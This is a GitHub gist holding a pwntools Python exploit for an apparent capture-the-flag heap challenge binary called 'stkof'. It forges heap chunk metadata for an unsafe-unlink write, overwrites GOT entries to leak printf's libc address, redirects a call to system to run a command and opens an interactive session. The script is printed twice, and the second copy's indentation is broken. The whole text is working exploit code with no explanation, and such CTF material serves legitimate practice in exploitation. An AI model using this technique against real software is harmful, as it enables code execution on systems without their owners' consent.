HoLyVieR/gist:6704a7123116f82275b0

## gistfile1.py
from pwn import *
from sys import *
import struct

offset_tab = 0x602140
r = process("./a679df07a8f3a8d590febad45336d031-stkof")

def add_node(size):
	r.sendline("1")
	r.sendline(str(size))
	stdout.write(r.recvline())
	stdout.write(r.recvline())

def set_node_value(index, value):
	r.sendline("2")
	r.sendline(str(index))
	r.sendline(str(len(value)))
	r.send(value)
	stdout.write(r.recvline())

def free_node(index, p=True):
	r.sendline("3")
	r.sendline(str(index))

	if p:
		stdout.write(r.recvline())

add_node(0x100)
add_node(0x100)
add_node(0x100)

set_node_value(2, "" +
	struct.pack("<Q", 0x110) +
	struct.pack("<Q", 0x100) +
	struct.pack("<Q", offset_tab - 1*8) +
	struct.pack("<Q", offset_tab - 0*8) +
	(0x100 - 0x20) * "B" +
	struct.pack("<Q", 0x100) +
	struct.pack("<Q", 0x110)
)

free_node(3)

free_got_plt  = struct.pack("<Q", 0x602018)
printf_got_plt = struct.pack("<Q", 0x602040)
printf_plt = struct.pack("<Q", 0x4007a0)
table_ptr = struct.pack("<Q", 0x602140 + 8*8)

set_node_value(2, "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789AABBCCDDEEFF" + free_got_plt + printf_got_plt + table_ptr + "ls\x00")
set_node_value(5, printf_plt)
free_node(6, False)

printf_val = int(r.recv()[:-3][::-1].encode("hex"), 16)

system = 0x7f811a67f3d0
pf = 0x7f811a68fba0

system_val = (system - pf) + printf_val
set_node_value(5, struct.pack("<Q", system_val))
free_node(7)

r.interactive()
	from pwn import *
	from sys import *
	import struct

	offset_tab = 0x602140
	r = process("./a679df07a8f3a8d590febad45336d031-stkof")

	def add_node(size):
	r.sendline("1")
	r.sendline(str(size))
	stdout.write(r.recvline())
	stdout.write(r.recvline())

	def set_node_value(index, value):
	r.sendline("2")
	r.sendline(str(index))
	r.sendline(str(len(value)))
	r.send(value)
	stdout.write(r.recvline())

	def free_node(index, p=True):
	r.sendline("3")
	r.sendline(str(index))

	if p:
	stdout.write(r.recvline())

	add_node(0x100)
	add_node(0x100)
	add_node(0x100)

	set_node_value(2, "" +
	struct.pack("<Q", 0x110) +
	struct.pack("<Q", 0x100) +
	struct.pack("<Q", offset_tab - 1*8) +
	struct.pack("<Q", offset_tab - 0*8) +
	(0x100 - 0x20) * "B" +
	struct.pack("<Q", 0x100) +
	struct.pack("<Q", 0x110)
	)

	free_node(3)

	free_got_plt = struct.pack("<Q", 0x602018)
	printf_got_plt = struct.pack("<Q", 0x602040)
	printf_plt = struct.pack("<Q", 0x4007a0)
	table_ptr = struct.pack("<Q", 0x602140 + 8*8)

	set_node_value(2, "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789AABBCCDDEEFF" + free_got_plt + printf_got_plt + table_ptr + "ls\x00")
	set_node_value(5, printf_plt)
	free_node(6, False)

	printf_val = int(r.recv()[:-3][::-1].encode("hex"), 16)

	system = 0x7f811a67f3d0
	pf = 0x7f811a68fba0

	system_val = (system - pf) + printf_val
	set_node_value(5, struct.pack("<Q", system_val))
	free_node(7)

	r.interactive()